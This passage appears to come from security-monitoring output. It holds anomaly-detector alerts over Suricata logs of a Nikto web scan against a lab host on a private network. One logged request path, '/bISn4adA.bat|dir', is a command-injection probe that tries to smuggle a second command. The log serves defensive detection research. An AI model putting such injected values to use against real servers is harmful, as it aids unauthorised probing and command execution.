HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46868 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.bat|dir", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": 
"{\"timestamp\":\"2020-03-04T19:18:34.254803+0000\",\"flow_id\":911490828394343,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bat|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bat|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.254803, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":911490828394343,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bat|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bat|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bat|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) 
(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bat|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.bat|dir\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.bat|dir\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.bat|dir", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.bat|dir", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", 
"/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": 
",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46868, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":911490828394343,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 911490828394343, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.254803+0000\",\"flow_id\":911490828394343,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46868,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.bat|dir\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.bat|dir\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.25 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", 
"/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.257364 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46870 -> 192.168.10.154:80", "/parser/model/time": 1583349514.257364, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46870, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.257364 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46870 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], 
"AffectedLogAtomValues": [ "\\/bISn4adA.prf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.257763+0000\",\"flow_id\":648776268834898,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.prf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.prf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.257763, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":648776268834898,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.prf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.prf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": 
",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.prf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.prf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.prf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.prf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.prf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.prf", 
"/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46870, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":648776268834898,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 648776268834898, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.257763+0000\",\"flow_id\":648776268834898,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46870,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.prf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.prf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", 
"PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.259495 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46872 -> 192.168.10.154:80", "/parser/model/time": 1583349514.259495, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46872, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.259495 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46872 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ 
"/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.tml", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.259845+0000\",\"flow_id\":2191605830972159,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.259845, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2191605830972159,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": 
"\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.tml\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.tml\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.tml", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": 
"mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.tml", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\"", 
"/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46872, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2191605830972159,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2191605830972159, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.259845+0000\",\"flow_id\":2191605830972159,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46872,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tml\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tml\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.26 ], "LogLinesCount": 1 } } { 